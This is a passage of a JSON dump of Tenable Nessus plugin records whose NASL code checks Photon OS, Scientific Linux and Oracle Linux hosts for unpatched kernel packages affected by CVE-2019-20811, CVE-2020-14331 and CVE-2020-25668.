security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'bpftool / kernel / kernel-abi-whitelists / etc');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-16T09:08:52", "description": "An update of the linux package has been released.", "edition": 3, "cvss3": {"score": 8.5, "vector": "AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-11-18T00:00:00", "title": "Photon OS 2.0: Linux PHSA-2020-2.0-0296", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-25668", "CVE-2019-20811"], "modified": "2020-11-18T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2020-2_0-0296_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/142991", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-2.0-0296. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142991);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/15\");\n\n script_cve_id(\"CVE-2019-20811\", \"CVE-2020-25668\");\n\n script_name(english:\"Photon OS 2.0: Linux PHSA-2020-2.0-0296\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-296.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 2.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', reference:'linux-api-headers-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-aws-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-aws-devel-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-aws-docs-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-aws-drivers-gpu-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-aws-oprofile-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-aws-sound-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-devel-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-docs-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-drivers-gpu-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-esx-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-esx-devel-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-esx-docs-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-oprofile-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-secure-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-secure-devel-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-secure-docs-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-secure-lkcm-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-sound-4.9.243-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-tools-4.9.243-1.ph2')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'linux');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-25T14:04:50", "description": "The remote Scientific Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe SLSA-2020:5023-1 advisory.\n\n - kernel: buffer over write in vgacon_scroll (CVE-2020-14331)\n\n - kernel: net-sysfs: *_queue_add_kobject refcount issue (CVE-2019-20811)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-12T00:00:00", "title": "Scientific Linux Security Update : kernel on SL7.x x86_64 (2020:5023)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14331", "CVE-2019-20811"], "modified": "2020-11-12T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists", "p-cpe:/a:fermilab:scientific_linux:bpftool", "p-cpe:/a:fermilab:scientific_linux:kernel", "cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel", "p-cpe:/a:fermilab:scientific_linux:bpftool-debuginfo", "p-cpe:/a:fermilab:scientific_linux:perf", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-tools", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs"], "id": "SL_20201110_KERNEL_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/142822", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142822);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/24\");\n\n script_cve_id(\"CVE-2019-20811\", \"CVE-2020-14331\");\n script_xref(name:\"RHSA\", value:\"RHSA-2020:5023\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL7.x x86_64 (2020:5023)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Scientific Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Scientific Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe SLSA-2020:5023-1 advisory.\n\n - kernel: buffer over write in vgacon_scroll (CVE-2020-14331)\n\n - kernel: net-sysfs: *_queue_add_kobject refcount issue (CVE-2019-20811)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.scientificlinux.org/category/sl-errata/slsa-20205023-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14331\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fermilab:scientific_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bpftool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bpftool-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Scientific Linux' >!< release) audit(AUDIT_OS_NOT, 'Scientific Linux');\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Scientific Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Scientific Linux 7.x', 'Scientific Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Scientific Linux', cpu);\n\npkgs = [\n {'reference':'bpftool-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'},\n {'reference':'bpftool-debuginfo-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'},\n {'reference':'kernel-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'},\n {'reference':'kernel-abi-whitelists-3.10.0-1160.6.1.el7', 'release':'SL7'},\n {'reference':'kernel-debug-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'},\n {'reference':'kernel-debug-debuginfo-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'},\n {'reference':'kernel-debug-devel-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'},\n {'reference':'kernel-debuginfo-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'},\n {'reference':'kernel-debuginfo-common-x86_64-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'},\n {'reference':'kernel-devel-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'},\n {'reference':'kernel-headers-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'},\n {'reference':'kernel-tools-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'},\n {'reference':'kernel-tools-debuginfo-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'},\n {'reference':'kernel-tools-libs-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'},\n {'reference':'kernel-tools-libs-devel-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'},\n {'reference':'perf-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'},\n {'reference':'perf-debuginfo-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'},\n {'reference':'python-perf-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'},\n {'reference':'python-perf-debuginfo-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'SL7'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'bpftool / bpftool-debuginfo / kernel / etc');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-15T05:23:06", "description": "The remote Oracle Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nELSA-2020-5023 advisory.\n\n - An issue was discovered in the Linux kernel before 5.0.6. In rx_queue_add_kobject() and\n netdev_queue_add_kobject() in net/core/net-sysfs.c, a reference count is mishandled, aka CID-a3e23f719f5c.\n (CVE-2019-20811)\n\n - A flaw was found in the Linux kernels implementation of the invert video code on VGA consoles when a\n local attacker attempts to resize the console, calling an ioctl VT_RESIZE, which causes an out-of-bounds\n write to occur. This flaw allows a local user with access to the VGA console to crash the system,\n potentially escalating their privileges on the system. The highest threat from this vulnerability is to\n data confidentiality and integrity as well as system availability. (CVE-2020-14331)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-12T00:00:00", "title": "Oracle Linux 7 : kernel (ELSA-2020-5023)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14331", "CVE-2019-20811"], "modified": "2020-11-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-tools", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:bpftool", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-tools-libs", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-tools-libs-devel", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2020-5023.NASL", "href": "https://www.tenable.com/plugins/nessus/142788", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2020-5023.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142788);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/13\");\n\n script_cve_id(\"CVE-2019-20811\", \"CVE-2020-14331\");\n\n script_name(english:\"Oracle Linux 7 : kernel (ELSA-2020-5023)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nELSA-2020-5023 advisory.\n\n - An issue was discovered in the Linux kernel before 5.0.6. In rx_queue_add_kobject() and\n netdev_queue_add_kobject() in net/core/net-sysfs.c, a reference count is mishandled, aka CID-a3e23f719f5c.\n (CVE-2019-20811)\n\n - A flaw was found in the Linux kernels implementation of the invert video code on VGA consoles when a\n local attacker attempts to resize the console, calling an ioctl VT_RESIZE, which causes an out-of-bounds\n write to occur. This flaw allows a local user with access to the VGA console to crash the system,\n potentially escalating their privileges on the system. The highest threat from this vulnerability is to\n data confidentiality and integrity as well as system availability. (CVE-2020-14331)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2020-5023.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14331\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bpftool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"linux_alt_patch_detect.nasl\", \"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('ksplice.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\nif ('x86_64' >!< cpu) audit(AUDIT_ARCH_NOT, 'x86_64', cpu);\n\nif (get_one_kb_item('Host/ksplice/kernel-cves'))\n{\n rm_kb_item(name:'Host/uptrack-uname-r');\n cve_list = make_list('CVE-2019-20811', 'CVE-2020-14331');\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for ELSA-2020-5023');\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item('Host/uname/major_minor');\nif (empty_or_null(kernel_major_minor)) exit(1, 'Unable to determine kernel major-minor level.');\nexpected_kernel_major_minor = '3.10';\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, 'running kernel level ' + expected_kernel_major_minor + ', it is running kernel level ' + kernel_major_minor);\n\npkgs = [\n {'reference':'bpftool-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7'},\n {'reference':'kernel-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_prefix':'kernel-3.10.0'},\n {'reference':'kernel-abi-whitelists-3.10.0-1160.6.1.el7', 'release':'7', 'rpm_prefix':'kernel-abi-whitelists-3.10.0'},\n {'reference':'kernel-debug-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_prefix':'kernel-debug-3.10.0'},\n {'reference':'kernel-debug-devel-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_prefix':'kernel-debug-devel-3.10.0'},\n {'reference':'kernel-devel-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_prefix':'kernel-devel-3.10.0'},\n {'reference':'kernel-headers-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_prefix':'kernel-headers-3.10.0'},\n {'reference':'kernel-tools-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_prefix':'kernel-tools-3.10.0'},\n {'reference':'kernel-tools-libs-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_prefix':'kernel-tools-libs-3.10.0'},\n {'reference':'kernel-tools-libs-devel-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_prefix':'kernel-tools-libs-devel-3.10.0'},\n {'reference':'perf-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7'},\n {'reference':'python-perf-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n rpm_prefix = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = 